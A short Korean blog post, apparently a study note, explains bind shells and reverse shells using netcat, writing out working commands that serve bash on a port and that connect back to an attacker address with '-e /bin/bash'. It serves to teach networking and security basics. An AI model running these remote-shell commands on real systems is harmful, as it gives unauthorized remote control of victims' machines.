안녕하세요 오늘은 bindshell과 reverse shell에 대해 알아보겠습니다.
bind shell은 피해자 컴퓨터에서 포트를 열고 그쪽으로 공격자가 들어가서 해킹을 하는것입니다.
그래서 이것은 그냥 서버에 접속한다고 보아두 됩니다.
우선 클라이언트에서 포트를 열어야 겠죠? 그러면 저번에 배운 nc를 통해
열어 보겠습니다.
nc -nlvp 7777 -e /bin/bash
이런식으로 할수있습니다. 여기서 -e /bin/bash는 bash 쉘을 실행시킨다는 의미 입니다.
다음으로는 공격자 컴퓨터로 접속을 해보겠습니다.
nc 192.168.0.12 7777
라고 하면 bind shell이 끝납니다.
하지만 노말틱님이 말하시길... 바인드 쉘은 100%중에 1%에 만쓰고 reverse shell을 99% 쓴다고 말하셨습니다.
그럼 바로 reverse shell로 가보겠습니다.
reverse shell은 공격자가 포트를 열고 피해자가 공격자 포트로 들어오는것 입니다.
대부분 해킹을 할때 리버스 쉘을 많이 사용한다고 하네요
우선 이것은 공격자가 포트를 열어야 합니다.
nc -nlvp 7777
그 다음 피해자가 그 포토로 들어가야 합니다.
nc 192.168.0.21 7777 -e /bin/bash
이제 끝 입니다.
| [네트워크] well-known port 개념/종류 (0) | 2023.07.28 |
|---|---|
| [네트워크] Remote shell 개념/종류 (0) | 2023.07.28 |
| [네트워크] Nat 개념/동작과정 (0) | 2023.07.26 |
| [네트워크] 3 way handshake, 4 way handshake 개념/동작 방식/ACK, SYN (0) | 2023.07.25 |
| [네트워크] ARP 개념/동작과정/태이블 (0) | 2023.07.24 |